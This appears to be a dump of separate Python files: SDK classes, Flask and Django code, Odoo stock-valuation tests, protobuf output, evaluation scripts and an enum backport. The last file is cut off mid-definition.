(ordinal_series()), ], ) def test_data_linewidth(data): """Test data_linewidth.""" lw = aes.data_linewidth(data, data) assert isinstance(lw, pd.Series) assert np.allclose(lw, data)
python
''' Created by auto_sdk on 2015.04.03 ''' from aliyun.api.base import RestApi class Mkvstore20150301DescribeInstancesRequest(RestApi): def __init__(self,domain='m-kvstore.aliyuncs.com',port=80): RestApi.__init__(self,domain, port) self.InstanceIds = None self.InstanceStatus = None self.NetworkType = None self.PageNumber = None self.PageSize = None self.PrivateIpAddresses = None self.RegionId = None self.VSwitchId = None self.VpcId = None def getapiname(self): return 'm-kvstore.aliyuncs.com.DescribeInstances.2015-03-01'
python
"About API endpoints." import http.client import flask from webapp import utils blueprint = flask.Blueprint("api", __name__) @blueprint.route("") def root(): "API root." items = { "schema": { "root": {"href": utils.url_for("api_schema.root")}, "logs": {"href": utils.url_for("api_schema.logs")}, "user": {"href": utils.url_for("api_schema.user")}, "users": {"href": utils.url_for("api_schema.users")}, "about/software": { "href": utils.url_for("api_schema.about_software") } }, "about": { "software": {"href": utils.url_for("api_about.software")} } } if flask.g.current_user: items["user"] = { "username": flask.g.current_user["username"], "href": utils.url_for("api_user.display", username=flask.g.current_user["username"]) } if flask.g.am_admin: items["users"] = { "href": utils.url_for("api_user.all") } return utils.jsonify(utils.get_json(**items), schema_url=utils.url_for("api_schema.root"))
python
data_all = pandas.read_csv('../data/gapminder_all.csv', index_col='country') data_all.plot(kind='scatter', x='gdpPercap_2007', y='lifeExp_2007', s=data_all['pop_2007']/1e6) # A good place to look is the documentation for the plot function - # help(data_all.plot). # kind - As seen already this determines the kind of plot to be drawn. # x and y - A column name or index that determines what data will be placed on # the x and y axes of the plot # s - Details for this can be found in the documentation of plt.scatter. A # single number or one value for each data point. Determines the size of the # plotted points.
python
# Generated by the protocol buffer compiler. DO NOT EDIT! # source: POGOProtos/Networking/Responses/GetMapObjectsResponse.proto import sys _b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1')) from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database from google.protobuf import descriptor_pb2 # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from POGOProtos.Map import MapCell_pb2 as POGOProtos_dot_Map_dot_MapCell__pb2 from POGOProtos.Map import MapObjectsStatus_pb2 as POGOProtos_dot_Map_dot_MapObjectsStatus__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='POGOProtos/Networking/Responses/GetMapObjectsResponse.proto', package='POGOProtos.Networking.Responses', syntax='proto3', serialized_pb=_b('\n;POGOProtos/Networking/Responses/GetMapObjectsResponse.proto\x12\x1fPOGOProtos.Networking.Responses\x1a\x1cPOGOProtos/Map/MapCell.proto\x1a%POGOProtos/Map/MapObjectsStatus.proto\"u\n\x15GetMapObjectsResponse\x12*\n\tmap_cells\x18\x01 \x03(\x0b\x32\x17.POGOProtos.Map.MapCell\x12\x30\n\x06status\x18\x02 \x01(\x0e\x32 .POGOProtos.Map.MapObjectsStatusb\x06proto3') , dependencies=[POGOProtos_dot_Map_dot_MapCell__pb2.DESCRIPTOR,POGOProtos_dot_Map_dot_MapObjectsStatus__pb2.DESCRIPTOR,]) _sym_db.RegisterFileDescriptor(DESCRIPTOR) _GETMAPOBJECTSRESPONSE = _descriptor.Descriptor( name='GetMapObjectsResponse', full_name='POGOProtos.Networking.Responses.GetMapObjectsResponse', filename=None, file=DESCRIPTOR, containing_type=None, fields=[ _descriptor.FieldDescriptor( name='map_cells', full_name='POGOProtos.Networking.Responses.GetMapObjectsResponse.map_cells', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), _descriptor.FieldDescriptor( name='status', full_name='POGOProtos.Networking.Responses.GetMapObjectsResponse.status', index=1, number=2, type=14, cpp_type=8, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, options=None), ], extensions=[ ], nested_types=[], enum_types=[ ], options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=165, serialized_end=282, ) _GETMAPOBJECTSRESPONSE.fields_by_name['map_cells'].message_type = POGOProtos_dot_Map_dot_MapCell__pb2._MAPCELL _GETMAPOBJECTSRESPONSE.fields_by_name['status'].enum_type = POGOProtos_dot_Map_dot_MapObjectsStatus__pb2._MAPOBJECTSSTATUS DESCRIPTOR.message_types_by_name['GetMapObjectsResponse'] = _GETMAPOBJECTSRESPONSE GetMapObjectsResponse = _reflection.GeneratedProtocolMessageType('GetMapObjectsResponse', (_message.Message,), dict( DESCRIPTOR = _GETMAPOBJECTSRESPONSE, __module__ = 'POGOProtos.Networking.Responses.GetMapObjectsResponse_pb2' # @@protoc_insertion_point(class_scope:POGOProtos.Networking.Responses.GetMapObjectsResponse) )) _sym_db.RegisterMessage(GetMapObjectsResponse) # @@protoc_insertion_point(module_scope)
python
import os PROJECT_ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) #TEST_DATA = os.path.join(PROJECT_ROOT, "data/train_2008011514_data.json") #TEST_JSON = os.path.join(PROJECT_ROOT, "test/test.json") BERT_MODEL = "bert-base-chinese" PAD = 0 UNK = 1 CLS = 2 SEP = 3 COMMA = 117 LESS_THAN = 133 LARGER_THAN = 135
python
from samtranslator.model import PropertyType, Resource from samtranslator.model.types import is_type, is_str class SNSSubscription(Resource): resource_type = 'AWS::SNS::Subscription' property_types = { 'Endpoint': PropertyType(True, is_str()), 'Protocol': PropertyType(True, is_str()), 'TopicArn': PropertyType(True, is_str()), 'FilterPolicy': PropertyType(False, is_type(dict)) }
python
# -*- coding: utf-8 -*- # Part of Odoo. See LICENSE file for full copyright and licensing details. from odoo.exceptions import UserError from odoo.tests import Form from odoo.addons.stock_account.tests.test_stockvaluation import _create_accounting_data from odoo.addons.stock_account.tests.test_stockvaluationlayer import TestStockValuationCommon class TestStockValuationLayerRevaluation(TestStockValuationCommon): @classmethod def setUpClass(cls): super(TestStockValuationLayerRevaluation, cls).setUpClass() cls.stock_input_account, cls.stock_output_account, cls.stock_valuation_account, cls.expense_account, cls.stock_journal = _create_accounting_data(cls.env) cls.product1.write({ 'property_account_expense_id': cls.expense_account.id, }) cls.product1.categ_id.write({ 'property_stock_account_input_categ_id': cls.stock_input_account.id, 'property_stock_account_output_categ_id': cls.stock_output_account.id, 'property_stock_valuation_account_id': cls.stock_valuation_account.id, 'property_stock_journal': cls.stock_journal.id, }) cls.product1.categ_id.property_valuation = 'real_time' def test_stock_valuation_layer_revaluation_avco(self): self.product1.categ_id.property_cost_method = 'average' context = { 'default_product_id': self.product1.id, 'default_company_id': self.env.company.id, 'default_added_value': 0.0 } # Quantity of product1 is zero, raise with self.assertRaises(UserError): Form(self.env['stock.valuation.layer.revaluation'].with_context(context)).save() self._make_in_move(self.product1, 10, unit_cost=2) self._make_in_move(self.product1, 10, unit_cost=4) self.assertEqual(self.product1.standard_price, 3) self.assertEqual(self.product1.quantity_svl, 20) old_layers = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc") self.assertEqual(len(old_layers), 2) self.assertEqual(old_layers[0].remaining_value, 40) revaluation_wizard = Form(self.env['stock.valuation.layer.revaluation'].with_context(context)) revaluation_wizard.added_value = 20 revaluation_wizard.account_id = self.stock_valuation_account revaluation_wizard.save().action_validate_revaluation() # Check standard price change self.assertEqual(self.product1.standard_price, 4) self.assertEqual(self.product1.quantity_svl, 20) # Check the creation of stock.valuation.layer new_layer = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc", limit=1) self.assertEqual(new_layer.value, 20) # Check the remaing value of current layers self.assertEqual(old_layers[0].remaining_value, 50) self.assertEqual(sum(slv.remaining_value for slv in old_layers), 80) # Check account move self.assertTrue(bool(new_layer.account_move_id)) self.assertEqual(len(new_layer.account_move_id.line_ids), 2) self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("debit")), 20) self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("credit")), 20) credit_lines = [l for l in new_layer.account_move_id.line_ids if l.credit > 0] self.assertEqual(len(credit_lines), 1) self.assertEqual(credit_lines[0].account_id.id, self.stock_valuation_account.id) def test_stock_valuation_layer_revaluation_avco_rounding(self): self.product1.categ_id.property_cost_method = 'average' context = { 'default_product_id': self.product1.id, 'default_company_id': self.env.company.id, 'default_added_value': 0.0 } # Quantity of product1 is zero, raise with self.assertRaises(UserError): Form(self.env['stock.valuation.layer.revaluation'].with_context(context)).save() self._make_in_move(self.product1, 1, unit_cost=1) self._make_in_move(self.product1, 1, unit_cost=1) self._make_in_move(self.product1, 1, unit_cost=1) self.assertEqual(self.product1.standard_price, 1) self.assertEqual(self.product1.quantity_svl, 3) old_layers = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc") self.assertEqual(len(old_layers), 3) self.assertEqual(old_layers[0].remaining_value, 1) revaluation_wizard = Form(self.env['stock.valuation.layer.revaluation'].with_context(context)) revaluation_wizard.added_value = 1 revaluation_wizard.account_id = self.stock_valuation_account revaluation_wizard.save().action_validate_revaluation() # Check standard price change self.assertEqual(self.product1.standard_price, 1.33) self.assertEqual(self.product1.quantity_svl, 3) # Check the creation of stock.valuation.layer new_layer = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc", limit=1) self.assertEqual(new_layer.value, 1) # Check the remaing value of current layers self.assertEqual(sum(slv.remaining_value for slv in old_layers), 4) self.assertTrue(1.34 in old_layers.mapped("remaining_value")) # Check account move self.assertTrue(bool(new_layer.account_move_id)) self.assertEqual(len(new_layer.account_move_id.line_ids), 2) self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("debit")), 1) self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("credit")), 1) credit_lines = [l for l in new_layer.account_move_id.line_ids if l.credit > 0] self.assertEqual(len(credit_lines), 1) self.assertEqual(credit_lines[0].account_id.id, self.stock_valuation_account.id) def test_stock_valuation_layer_revaluation_fifo(self): self.product1.categ_id.property_cost_method = 'fifo' context = { 'default_product_id': self.product1.id, 'default_company_id': self.env.company.id, 'default_added_value': 0.0 } # Quantity of product1 is zero, raise with self.assertRaises(UserError): Form(self.env['stock.valuation.layer.revaluation'].with_context(context)).save() self._make_in_move(self.product1, 10, unit_cost=2) self._make_in_move(self.product1, 10, unit_cost=4) self.assertEqual(self.product1.standard_price, 2) self.assertEqual(self.product1.quantity_svl, 20) old_layers = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc") self.assertEqual(len(old_layers), 2) self.assertEqual(old_layers[0].remaining_value, 40) revaluation_wizard = Form(self.env['stock.valuation.layer.revaluation'].with_context(context)) revaluation_wizard.added_value = 20 revaluation_wizard.account_id = self.stock_valuation_account revaluation_wizard.save().action_validate_revaluation() self.assertEqual(self.product1.standard_price, 2) # Check the creation of stock.valuation.layer new_layer = self.env['stock.valuation.layer'].search([('product_id', '=', self.product1.id)], order="create_date desc, id desc", limit=1) self.assertEqual(new_layer.value, 20) # Check the remaing value of current layers self.assertEqual(old_layers[0].remaining_value, 50) self.assertEqual(sum(slv.remaining_value for slv in old_layers), 80) # Check account move self.assertTrue(bool(new_layer.account_move_id)) self.assertTrue(len(new_layer.account_move_id.line_ids), 2) self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("debit")), 20) self.assertEqual(sum(new_layer.account_move_id.line_ids.mapped("credit")), 20) credit_lines = [l for l in new_layer.account_move_id.line_ids if l.credit > 0] self.assertEqual(len(credit_lines), 1)
python
# django==1.6.1 # django_facebook==5.3.1 from django.test import TestCase from django_facebook.models import FacebookCustomUser class MyTest(TestCase): def setUp(self): user = FacebookCustomUser() user.facebook_id = '123456789' user.save() def do_login(self): self.client.login(facebook_id = '123456789') def test_get_api(self): self.do_login() response = self.client.get(url) # do your asserts and other tests here
python
f = open("tags_from_tiktok.txt", 'r') data = f.read() lst = data.split('\n') tmp = [] for line in lst: if line == '': continue line = line.strip() if not (line in tmp): tmp.append(line) f.close() f = open("tags_from_tiktok.txt", 'w') for line in tmp: f.write(line + '\n') f.close()
python
import komand from .schema import AnalyzeInput, AnalyzeOutput # Custom imports below import requests class Analyze(komand.Action): def __init__(self): super(self.__class__, self).__init__( name="analyze", description="Initialize an SSL assessment", input=AnalyzeInput(), output=AnalyzeOutput(), ) def run(self, params={}): try: url = "https://api.ssllabs.com/api/v2/analyze" r_params = { "host": params.get("host"), "publish": params.get("ip"), "maxAge": params.get("max_age"), "all": params.get("all").lower(), "fromCache": params.get("from_cache").lower(), "startNew": params.get("start_new").lower(), } r = requests.get(url, params=r_params).json() if "endpoints" not in r: self.logger.info("Endpoints not found in response") r.update({"endpoints": []}) if "testTime" not in r: self.logger.info("testTime not found in response, marking as 0") r.update({"testTime": 0}) return r except requests.exceptions.RequestException as e: raise Exception(e) def test(self): try: url = "https://api.ssllabs.com/api/v2/info" r = requests.get(url) if r.ok: return { "testTime": 1, "criteriaVersion": "True", "port": 1, "isPublic": True, "status": "True", "startTime": 1, "engineVersion": "True", "endpoints": [], "host": "True", "protocol": "Truw", } except requests.exceptions.RequestException as e: raise Exception(e)
python
# demo import numpy as np from skimage import io import glob from core.DUT_eval.measures import compute_ave_MAE_of_methods def dut_eval(gt_dir, rs_dirs): ## 0. =======set the data path======= print("------0. set the data path------") # # >>>>>>> Follows have to be manually configured <<<<<<< # data_name = 'TEST-DATA' # this will be drawn on the bottom center of the figures # data_dir = '../test_data/' # set the data directory, # # ground truth and results to-be-evaluated should be in this directory # # the figures of PR and F-measure curves will be saved in this directory as well # gt_dir = 'DUT-OMRON/pixelwiseGT-new-PNG'# 'gt' # set the ground truth folder name # rs_dirs = ['u2net_results']#['rs1','rs2'] # set the folder names of different methods # # 'rs1' contains the result of method1 # # 'rs2' contains the result of method 2 # # we suggest to name the folder as the method names because they will be shown in the figures' legend lineSylClr = ['r-', 'b-'] # curve style, same size with rs_dirs linewidth = [2, 1] # line width, same size with rs_dirs # >>>>>>> Above have to be manually configured <<<<<<< # gt_name_list = glob.glob(gt_dir + '/' + '*.png') # get the ground truth file name list ## get directory list of predicted maps rs_dir_lists = [] for i in range(len(rs_dirs)): rs_dir_lists.append(rs_dirs[i] + '/') print('\n') ## 1. =======compute the average MAE of methods========= print("------1. Compute the average MAE of Methods------") aveMAE, gt2rs_mae = compute_ave_MAE_of_methods(gt_name_list, rs_dir_lists) print('\n') for i in range(0, len(rs_dirs)): print('>>%s: num_rs/num_gt-> %d/%d, aveMAE-> %.3f' % (rs_dirs[i], gt2rs_mae[i], len(gt_name_list), aveMAE[i])) ## 2. =======compute the Precision, Recall and F-measure of methods========= from core.DUT_eval.measures import compute_PRE_REC_FM_of_methods, plot_save_pr_curves, plot_save_fm_curves print('\n') print("------2. Compute the Precision, Recall and F-measure of Methods------") PRE, REC, FM, gt2rs_fm = compute_PRE_REC_FM_of_methods(gt_name_list, rs_dir_lists, beta=0.3) for i in range(0, FM.shape[0]): print(">>", rs_dirs[i], ":", "num_rs/num_gt-> %d/%d," % (int(gt2rs_fm[i][0]), len(gt_name_list)), "maxF->%.3f, " % (np.max(FM, 1)[i]), "meanF->%.3f, " % (np.mean(FM, 1)[i])) print('\n') ## end print('Done!!!') return aveMAE[0], np.max(FM, 1)[0]
python
a = ["a3","a2","a1"] # print(f"{a[0]}") a = range(1,9) for i in range(1,9): print(f"{a[i-1]}")
python
"""Python Enumerations""" import sys as _sys __all__ = ['Enum', 'IntEnum', 'unique'] version = 1, 1, 3 pyver = float('%s.%s' % _sys.version_info[:2]) try: any except NameError: def any(iterable): for element in iterable: if element: return True return False try: from collections import OrderedDict except ImportError: OrderedDict = None try: basestring except NameError: # In Python 2 basestring is the ancestor of both str and unicode # in Python 3 it's just str, but was missing in 3.1 basestring = str try: unicode except NameError: # In Python 3 unicode no longer exists (it's just str) unicode = str class _RouteClassAttributeToGetattr(object): """Route attribute access on a class to __getattr__. This is a descriptor, used to define attributes that act differently when accessed through an instance and through a class. Instance access remains normal, but access to an attribute through a class will be routed to the class's __getattr__ method; this is done by raising AttributeError. """ def __init__(self, fget=None): self.fget = fget def __get__(self, instance, ownerclass=None): if instance is None: raise AttributeError() return self.fget(instance) def __set__(self, instance, value): raise AttributeError("can't set attribute") def __delete__(self, instance): raise AttributeError("can't delete attribute") def _is_descriptor(obj): """Returns True if obj is a descriptor, False otherwise.""" return ( hasattr(obj, '__get__') or hasattr(obj, '__set__') or hasattr(obj, '__delete__')) def _is_dunder(name): """Returns True if a __dunder__ name, False otherwise.""" return (name[:2] == name[-2:] == '__' and name[2:3] != '_' and name[-3:-2] != '_' and len(name) > 4) def _is_sunder(name): """Returns True if a _sunder_ name, False otherwise.""" return (name[0] == name[-1] == '_' and name[1:2] != '_' and name[-2:-1] != '_' and len(name) > 2) def _make_class_unpicklable(cls): """Make the given class un-picklable.""" def _break_on_call_reduce(self, protocol=None): raise TypeError('%r cannot be pickled' % self) cls.__reduce_ex__ = _break_on_call_reduce cls.__module__ = '<unknown>' class _EnumDict(dict): """Track enum member order and ensure member names are not reused. EnumMeta will use the names found in self._member_names as the enumeration member names. """ def __init__(self): super(_EnumDict, self).__init__() self._member_names = [] def __setitem__(self, key, value): """Changes anything not dundered or not a descriptor. If a descriptor is added with the same name as an enum member, the name is removed from _member_names (this may leave a hole in the numerical sequence of values). If an enum member name is used twice, an error is raised; duplicate values are not checked for. Single underscore (sunder) names are reserved. Note: in 3.x __order__ is simply discarded as a not necessary piece leftover from 2.x """ if pyver >= 3.0 and key == '__order__': return if _is_sunder(key): raise ValueError('_names_ are reserved for future Enum use') elif _is_dunder(key): pass elif key in self._member_names: # descriptor overwriting an enum? raise TypeError('Attempted to reuse key: %r' % key) elif not _is_descriptor(value): if key in self: # enum overwriting a descriptor? raise TypeError('Key already defined as: %r' % self[key]) self._member_names.append(key) super(_EnumDict, self).__setitem__(key, value) # Dummy value for Enum as EnumMeta explicity checks for it, but of course until # EnumMeta finishes running the first time the Enum class doesn't exist. This # is also why there are checks in EnumMeta like `if Enum is not None` Enum = None class EnumMeta(type): """Metaclass for Enum""" @classmethod def __prepare__(metacls, cls, bases): return _EnumDict() def __new__(metacls, cls, bases, classdict): # an Enum class is final once enumeration items have been defined; it # cannot be mixed with other types (int, float, etc.) if it has an # inherited __new__ unless a new __new__ is defined (or the resulting # class will fail). if type(classdict) is dict: original_dict = classdict classdict = _EnumDict() for k, v in original_dict.items(): classdict[k] = v member_type, first_enum = metacls._get_mixins_(bases) __new__, save_new, use_args = metacls._find_new_(classdict, member_type, first_enum) # save enum items into separate mapping so they don't get baked into # the new class members = dict((k, classdict[k]) for k in classdict._member_names) for name in classdict._member_names: del classdict[name] # py2 support for definition order __order__ = classdict.get('__order__') if __order__ is None: if pyver < 3.0: try: __order__ = [name for (name, value) in sorted(members.items(), key=lambda item: item[1])] except TypeError: __order__ = [name for name in sorted(members.keys())] else: __order__ = classdict._member_names else: del classdict['__order__'] if pyver < 3.0: __order__ = __order__.replace(',', ' ').split() aliases = [name for name in members if name not in __order__] __order__ += aliases # check for illegal enum names (any others?) invalid_names = set(members) & set(['mro']) if invalid_names: raise ValueError('Invalid enum member name(s): %s' % ( ', '.join(invalid_names), )) # save attributes from super classes so we know if we can take # the shortcut of storing members in the class dict base_attributes = set([a for b in bases for a in b.__dict__]) # create our new Enum type enum_class = super(EnumMeta, metacls).__new__(metacls, cls, bases, classdict) enum_class._member_names_ = [] # names in random order if OrderedDict is not None: enum_class._member_map_ = OrderedDict() else: enum_class._member_map_ = {} # name->value map enum_class._member_type_ = member_type # Reverse value->name map for hashable values. enum_class._value2member_map_ = {} # instantiate them, checking for duplicates as we go # we instantiate first instead of checking for duplicates first in case # a custom __new__ is doing something funky with the values -- such as # auto-numbering ;) if __new__ is None: __new__ = enum_class.__new__ for member_name in __order__: value = members[member_name] if not isinstance(value, tuple): args = (value, ) else: args = value if member_type is tuple: # special case for tuple enums args = (args, ) # wrap it one more time if not use_args or not args: enum_member = __new__(enum_class) if not hasattr(enum_member, '_value_'): enum_member._value_ = value else: enum_member = __new__(enum_class, *args) if not hasattr(enum_member, '_value_'): enum_member._value_ = member_type(*args) value = enum_member._value_ enum_member._name_ = member_name enum_member.__objclass__ = enum_class enum_member.__init__(*args) # If another member with the same value was already defined, the # new member becomes an alias to the existing one. for name, canonical_member in enum_class._member_map_.items(): if canonical_member.value == enum_member._value_: enum_member = canonical_member break else: # Aliases don't appear in member names (only in __members__). enum_class._member_names_.append(member_name) # performance boost for any member that would not shadow # a DynamicClassAttribute (aka _RouteClassAttributeToGetattr) if member_name not in base_attributes: setattr(enum_class, member_name, enum_member) # now add to _member_map_ enum_class._member_map_[member_name] = enum_member try: # This may fail if value is not hashable. We can't add the value # to the map, and by-value lookups for this value will be # linear. enum_class._value2member_map_[value] = enum_member except TypeError: pass # If a custom type is mixed into the Enum, and it does not know how # to pickle itself, pickle.dumps will succeed but pickle.loads will # fail. Rather than have the error show up later and possibly far # from the source, sabotage the pickle protocol for this class so # that pickle.dumps also fails. # # However, if the new class implements its own __reduce_ex__, do not # sabotage -- it's on them to make sure it works correctly. We use # __reduce_ex__ instead of any of the others as it is preferred by # pickle over __reduce__, and it handles all pickle protocols. unpicklable = False if '__reduce_ex__' not in classdict: if member_type is not object: methods = ('__getnewargs_ex__', '__getnewargs__', '__reduce_ex__', '__reduce__') if not any(m in member_type.__dict__ for m in methods): _make_class_unpicklable(enum_class) unpicklable = True # double check that repr and friends are not the mixin's or various # things break (such as pickle) for name in ('__repr__', '__str__', '__format__', '__reduce_ex__'): class_method = getattr(enum_class, name) obj_method = getattr(member_type, name, None) enum_method = getattr(first_enum, name, None) if name not in classdict and class_method is not enum_method: if name == '__reduce_ex__' and unpicklable: continue setattr(enum_class, name, enum_method) # method resolution and int's are not playing nice # Python's less than 2.6 use __cmp__ if pyver < 2.6: if issubclass(enum_class, int): setattr(enum_class, '__cmp__', getattr(int, '__cmp__')) elif pyver < 3.0: if issubclass(enum_class, int): for method in ( '__le__', '__lt__', '__gt__', '__ge__', '__eq__', '__ne__', '__hash__', ): setattr(enum_class, method, getattr(int, method)) # replace any other __new__ with our own (as long as Enum is not None, # anyway) -- again, this is to support pickle if Enum is not None: # if the user defined their own __new__, save it before it gets # clobbered in case they subclass later if save_new: setattr(enum_class, '__member_new__', enum_class.__dict__['__new__']) setattr(enum_class, '__new__', Enum.__dict__['__new__']) return enum_class def __bool__(cls): """ classes/types should always be True. """ return True def __call__(cls, value, names=None, module=None, type=None, start=1): """Either returns an existing member, or creates a new enum class. This method is used both when an enum class is given a value to match to an enumeration member (i.e. Color(3)) and for the functional API (i.e. Color = Enum('Color', names='red green blue')). When used for the functional API: `module`, if set, will be stored in the new class' __module__ attribute; `type`, if set, will be mixed in as the first base class. Note: if `module` is not set this routine will attempt to discover the calling module by walking the frame stack; if this is unsuccessful the resulting class will not be pickleable. """ if names is None: # simple value lookup return cls.__new__(cls, value) # otherwise, functional API: we're creating a new Enum type return cls._create_(value, names, module=module, type=type, start=start) def __contains__(cls, member): return isinstance(member, cls) and member.name in cls._member_map_ def __delattr__(cls, attr): # nicer error message when someone tries to delete an attribute # (see issue19025). if attr in cls._member_map_: raise AttributeError( "%s: cannot delete Enum member." % cls.__name__) super(EnumMeta, cls).__delattr__(attr) def __dir__(self): return (['__class__', '__doc__', '__members__', '__module__'] + self._member_names_) @property def __members__(cls): """Returns a mapping of member name->value. This mapping lists all enum members, including aliases. Note that this is a copy of the internal mapping. """ return cls._member_map_.copy() def __getattr__(cls, name): """Return the enum member matching `name` We use __getattr__ instead of descriptors or inserting into the enum class' __dict__ in order to support `name` and `value` being both properties for enum members (which live in the class' __dict__) and enum members themselves. """ if _is_dunder(name): raise AttributeError(name) try: return cls._member_map_[name] except KeyError: raise AttributeError(name) def __getitem__(cls, name): return cls._member_map_[name] def __iter__(cls): return (cls._member_map_[name] for name in cls._member_names_) def __reversed__(cls): return (cls._member_map_[name] for name in reversed(cls._member_names_)) def __len__(cls): return len(cls._member_names_) __nonzero__ = __bool__ def __repr__(cls): return "<enum %r>" % cls.__name__ def __setattr__(cls, name, value): """Block attempts to reassign Enum members. A simple assignment to the class namespace only changes one of the several possible ways to get an Enum member from the Enum class, resulting in an inconsistent Enumeration. """ member_map = cls.__dict__.get('_member_map_', {}) if name in member_map: raise AttributeError('Cannot reassign members.') super(EnumMeta, cls).__setattr__(name, value) def _create_(cls, class_name, names=None, module=None, type=None, start=1): """Convenience method to create a new Enum class. `names` can be: * A string containing member names, separated either with spaces or commas. Values are auto-numbered from 1. * An iterable of member names. Values are auto-numbered from 1. * An iterable of (member name, value) pairs. * A mapping of member name -> value. """ if pyver < 3.0: # if class_name is unicode, attempt a conversion to ASCII if isinstance(class_name, unicode): try: class_name = class_name.encode('ascii') except UnicodeEncodeError: raise TypeError('%r is not representable in ASCII' % class_name) metacls = cls.__class__ if type is None: bases = (cls, ) else: bases = (type, cls) classdict = metacls.__prepare__(class_name, bases) __order__ = [] # special processing needed for names? if isinstance(names, basestring): names = names.replace(',', ' ').split() if isinstance(names, (tuple, list)) and isinstance(names[0], basestring): names = [(e, i+start) for (i, e) in enumerate(names)] # Here, names is either an iterable of (name, value) or a mapping. item = None # in case names is empty for item in names: if isinstance(item, basestring): member_name, member_value = item, names[item] else: member_name, member_value = item classdict[member_name] = member_value __order__.append(member_name) # only set __order__ in classdict if name/value was not from a mapping if not isinstance(item, basestring): classdict['__order__'] = ' '.join(__order__) enum_class = metacls.__new__(metacls, class_name, bases, classdict) # TODO: replace the frame hack if a blessed way to know the calling # module is ever developed if module is None: try: module = _sys._getframe(2).f_globals['__name__'] except (AttributeError, ValueError): pass if module is None: _make_class_unpicklable(enum_class) else: enum_class.__module__ = module return enum_class @staticmethod def _get_mixins_(bases): """Returns the type for creating enum members, and the first inherited enum class. bases: the tuple of bases that was given to __new__ """ if not bases or Enum is None: return object, Enum # double check that we are not subclassing a class with existing # enumeration members; while we're at it, see if any other data # type has been mixed in so we can use the correct __new__ member_type = first_enum = None for base in bases: if (base is not Enum and issubclass(base, Enum) and base._member_names_): raise TypeError("Cannot extend enumerations") # base is now the last base in bases if not issubclass(base, Enum): raise TypeError("new enumerations must be created as " "`ClassName([mixin_type,] enum_type)`") # get correct mix-in type (either mix-in type of Enum subclass, or # first base if last base is Enum) if not issubclass(bases[0], Enum): member_type = bases[0] # first data type first_enum = bases[-1] # enum type else: for base in bases[0].__mro__: # most common: (IntEnum, int, Enum, object) # possible: (<Enum 'AutoIntEnum'>, <Enum 'IntEnum'>, # <class 'int'>, <Enum 'Enum'>, # <class 'object'>) if issubclass(base, Enum): if first_enum is None: first_enum = base else: if member_type is None: member_type = base return member_type, first_enum if pyver < 3.0: @staticmethod def _find_new_(classdict, member_type, first_enum): """Returns the __new__ to be used for creating the enum members. classdict: the class dictionary given to __new__ member_type: the data type whose __new__ will be used by default first_enum: enumeration to check for an overriding __new__ """ # now find the correct __new__, checking to see of one was defined # by the user; also check earlier enum classes in case a __new__ was # saved as __member_new__ __new__ = classdict.get('__new__', None) if __new__: return None, True, True # __new__, save_new, use_args N__new__ = getattr(None, '__new__') O__new__ = getattr(object, '__new__') if Enum is None: E__new__ = N__new__ else: E__new__ = Enum.__dict__['__new__'] # check all possibles for __member_new__ before falling back to # __new__ for method in ('__member_new__', '__new__'): for possible in (member_type, first_enum): try: target = possible.__dict__[method] except (AttributeError, KeyError): target = getattr(possible, method, None) if target not in [ None, N__new__, O__new__, E__new__, ]: if method == '__member_new__': classdict['__new__'] = target return None, False, True if isinstance(target, staticmethod): target = target.__get__(member_type) __new__ = target break if __new__ is not None: break else: __new__ = object.__new__ # if a non-object.__new__ is used then whatever value/tuple was # assigned to the enum member name will be passed to __new__ and to the # new enum member's __init__ if __new__ is object.__new__: use_args = False else: use_args = True return __new__, False, use_args else: @staticmethod def _find_new_(classdict, member_type, first_enum): """Returns the __new__ to be used for creating the enum members. classdict: the class dictionary given to __new__ member_type: the data type whose __new__ will be used by default first_enum: enumeration to check for an overriding __new__ """ # now find the correct __new__, checking to see of one was defined # by the user; also check earlier enum classes in case a __new__ was # saved as __member_new__ __new__ = classdict.get('__new__', None) # should __new__ be saved as __member_new__ later? save_new = __new__ is not None if __new__ is None: # check all possibles for __member_new__ before falling back to # __new__ for method in ('__member_new__', '__new__'): for possible in (member_type, first_enum): target = getattr(possible, method, None) if target not in ( None, None.__new__, object.__new__, Enum.__new__, ): __new__ = target break if __new__ is not None: break else: __new__ = object.__new__ # if a non-object.__new__ is used then whatever value/tuple was # assigned to the enum member name will be passed to __new__ and to the # new enum member's __init__ if __new__ is object.__new__: use_args = False else: use_args = True return __new__, save_new, use_args ######################################################## # In order to support Python 2 and 3 with a single # codebase we have to create the Enum methods separately # and then use the `type(name, bases, dict)` method to # create the class. ######################################################## temp_enum_dict = {} temp_enum_dict['__doc__'] = "Generic enumeration.\n\n Derive from this class to define new enumerations.\n\n" def __new__(cls, value): # all enum instances are actually created during class construction # without calling this method; this method is called by the metaclass' # __call__ (i.e. Color(3) ), and by pickle if type(value) is cls: # For lookups like Color(Color.red) value = value.value #return value # by-value search for a matching enum member # see if it's in the reverse mapping (for hashable values) try: if value in cls._value2member_map_: return cls._value2member_map_[value] except TypeError: # not there, now do long search -- O(n) behavior for member in cls._member_map_.values(): if member.value == value: return member raise ValueError("%s is not a valid %s" % (value, cls.__name__)) temp_enum_dict['__new__'] = __new__ del __new__ def __repr__(self): return "<%s.%s: %r>" % ( self.__class__.__name__, self._name_, self._value_) temp_enum_dict['__repr__'] = __repr__ del 